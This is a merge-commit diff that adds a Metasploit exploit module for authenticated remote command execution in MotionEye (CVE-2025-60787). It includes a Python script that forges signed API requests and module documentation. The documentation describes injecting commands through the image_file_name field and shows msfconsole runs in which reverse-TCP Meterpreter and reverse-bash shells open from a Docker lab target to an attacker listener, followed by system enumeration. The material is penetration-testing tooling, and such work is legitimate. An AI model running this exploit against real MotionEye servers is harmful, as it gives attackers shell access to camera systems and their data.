Merge pull request #20585 from vognik/CVE_2025_60787

Add MotionEye Authenticated RCE (CVE-2025-60787)

Author: bwatters-r7

data/exploits/CVE-2025-60787/sign_request.py

@@ -0,0 +1,88 @@
+import hashlib
+import re
+import argparse
+import sys
+from urllib.parse import urlsplit, parse_qs, unquote, quote
+from typing import Dict, List, Tuple
+
+_SIGNATURE_REGEX = re.compile(r'[^A-Za-z0-9/?_.=&{}\[\]":, -]')
+
+def compute_signature(method: str, path: str, body: str = '', key: str = '') -> str:
+    if not method or not path:
+        raise ValueError("Method and path must be provided.")
+
+    url_parts = urlsplit(path)
+    base_path = url_parts.path
+    
+    if not base_path.startswith('/'):
+        base_path = '/' + base_path
+    
+    raw_query_params: Dict[str, List[str]] = parse_qs(
+        url_parts.query, keep_blank_values=True, strict_parsing=False
+    )
+    
+    canonical_query: List[Tuple[str, str]] = []
+    for k, v_list in raw_query_params.items():
+        if k == '_signature':
+            continue
+            
+        value = unquote(v_list[0]) if v_list else ''
+        canonical_query.append((k, value))
+    
+    canonical_query.sort(key=lambda item: item[0])
+    
+    query_string = '&'.join(f"{k}={quote(v)}" for k, v in canonical_query)
+
+    if query_string:
+        canonical_path = f"{base_path}?{query_string}"
+    else:
+        canonical_path = base_path
+        
+    canonical_path = re.sub(_SIGNATURE_REGEX, '-', canonical_path)
+
+    body_for_signing = re.sub(_SIGNATURE_REGEX, '-', body)
+    
+    if not key:
+        password_hash = "da39a3ee5e6b4b0d3255bfef95601890afd80709"
+    else:
+        password_hash = hashlib.sha1(key.encode('utf-8')).hexdigest().lower()
+
+    data = f"{method.upper()}:{canonical_path}:{body_for_signing}:{password_hash}"
+    
+    return hashlib.sha1(data.encode('utf-8')).hexdigest().lower()
+
+def main():
+    parser = argparse.ArgumentParser(description="Computes a SHA1 signature for an HTTP request.")
+
+    parser.add_argument('--method', type=str, required=True,
+                        choices=['GET', 'POST', 'PUT', 'DELETE'],
+                        help="The HTTP method (e.g., GET).")
+    parser.add_argument('--path', type=str, required=True,
+                        help="The canonical path (e.g., /api/resource?param=value).")
+    parser.add_argument('--key', type=str, default='',
+                        help="The secret key. Defaults to an empty string.")
+    parser.add_argument('--body', type=str, default='',
+                        help="The request body as a string. Defaults to an empty string.")
+
+    try:
+        args = parser.parse_args()
+        
+        signature = compute_signature(
+            method=args.method,
+            path=args.path,
+            body=args.body,
+            key=args.key
+        )
+
+        print(f"Computed Signature: {signature}")
+
+    except ValueError as e:
+        sys.stderr.write(f"Error: {e}\n")
+        sys.exit(1)
+    except Exception as e:
+        sys.stderr.write(f"An unexpected error occurred: {e}\n")
+        sys.exit(1)
+
+
+if __name__ == '__main__':
+    main()

documentation/modules/exploit/linux/http/motioneye_auth_rce_cve_2025_60787.md

@@ -0,0 +1,112 @@
+## Vulnerable Application
+
+This module exploits a template injection vulnerability in the [MotionEye Frontend](https://github.com/motioneye-project/motioneye).
+
+MotionEye Frontend versions 0.43.1b4 and prior are vulnerable to OS Command Injection in configuration parameters such as `image_file_name`.
+Unsanitized user input is written to MotionEye Frontend configuration files, allowing remote authenticated attackers with admin access to achieve code execution.
+
+Successful exploitation will result in the command executing as the user running
+the web server, potentially exposing sensitive data or disrupting survey operations.
+
+An attacker can execute arbitrary system commands in the context of the user running the web server.
+
+## Exploit Workflow
+
+1. Adds a new camera in MotionEye Frontend.
+2. Injects the payload into the `image_file_name` field (used for naming camera screenshots).
+3. Captures a screenshot ("snapshot" in the terminology of MotionEye), triggering the payload.
+
+## Testing
+
+1. Use Docker to set up the MotionEye app
+
+`docker run -p 9999:8765 ghcr.io/motioneye-project/motioneye@sha256:2dcc3c4da1830ef824067375b2e022fa28c5fdbca773f5496bd35543ec45bef7`
+
+2. Open http://127.0.0.1:9999/ and make sure the app is available
+
+## Scenario
+
+### cmd/linux/http/x64/meterpreter/reverse_tcp
+
+```
+msf6 > use exploit/multi/http/motioneye_auth_rce_cve_2025_60787
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/motioneye_auth_rce_cve_2025_60787) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(multi/http/motioneye_auth_rce_cve_2025_60787) > set RPORT 9999
+RPORT => 9999
+msf6 exploit(multi/http/motioneye_auth_rce_cve_2025_60787) > set FETCH_SRVHOST 172.17.0.1
+FETCH_SRVHOST => 172.17.0.1
+msf6 exploit(multi/http/motioneye_auth_rce_cve_2025_60787) > set PASSWORD 12345
+PASSWORD => 12345
+msf6 exploit(multi/http/motioneye_auth_rce_cve_2025_60787) > run
+
+[*] Started reverse TCP handler on 192.168.19.130:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Detected version 0.43.14, which is vulnerable
+[*] Adding malicious camera...
+[+] Camera successfully added
+[*] Setting up exploit...
+[+] Exploit setup complete
+[*] Triggering exploit...
+[+] Exploit triggered, waiting for session...
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.19.130:4444 -> 172.17.0.2:38124) at 2025-10-04 21:08:57 -0400
+[*] Removing camera
+[+] Camera removed successfully
+
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Debian 13.1 (Linux 6.11.2-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### cmd/unix/reverse_bash
+
+```
+msf6 > use exploit/multi/http/motioneye_auth_rce_cve_2025_60787
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/motioneye_auth_rce_cve_2025_60787) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf6 exploit(multi/http/motioneye_auth_rce_cve_2025_60787) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(multi/http/motioneye_auth_rce_cve_2025_60787) > set RPORT 9999
+RPORT => 9999
+msf6 exploit(multi/http/motioneye_auth_rce_cve_2025_60787) > run
+
+[*] Started reverse TCP handler on 192.168.19.130:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Detected version 0.43.14, which is vulnerable
+[*] Adding malicious camera...
+[+] Camera successfully added
+[*] Setting up exploit...
+[+] Exploit setup complete
+[*] Triggering exploit...
+[+] Exploit triggered, waiting for session...
+[*] Command shell session 1 opened (192.168.19.130:4444 -> 172.17.0.2:60160) at 2025-10-06 04:46:34 -0400
+[*] Removing camera
+[+] Camera removed successfully
+
+cat /etc/os-release
+PRETTY_NAME="Debian GNU/Linux 13 (trixie)"
+NAME="Debian GNU/Linux"
+VERSION_ID="13"
+VERSION="13 (trixie)"
+VERSION_CODENAME=trixie
+DEBIAN_VERSION_FULL=13.1
+ID=debian
+HOME_URL="https://www.debian.org/"
+SUPPORT_URL="https://www.debian.org/support"
+BUG_REPORT_URL="https://bugs.debian.org/"
+```
+
+## Script for signing requests
+
+A script for manually signing requests is available in data/exploits/CVE-2025-60787/sign_request.py and can be used for debugging purposes.
+
+Example of usage:
+```
+python3 ./sign_request.py --method "GET" --path "/config/1/get/?force=true&_=1759747431350&_username=admin" --body "" --key ""
+```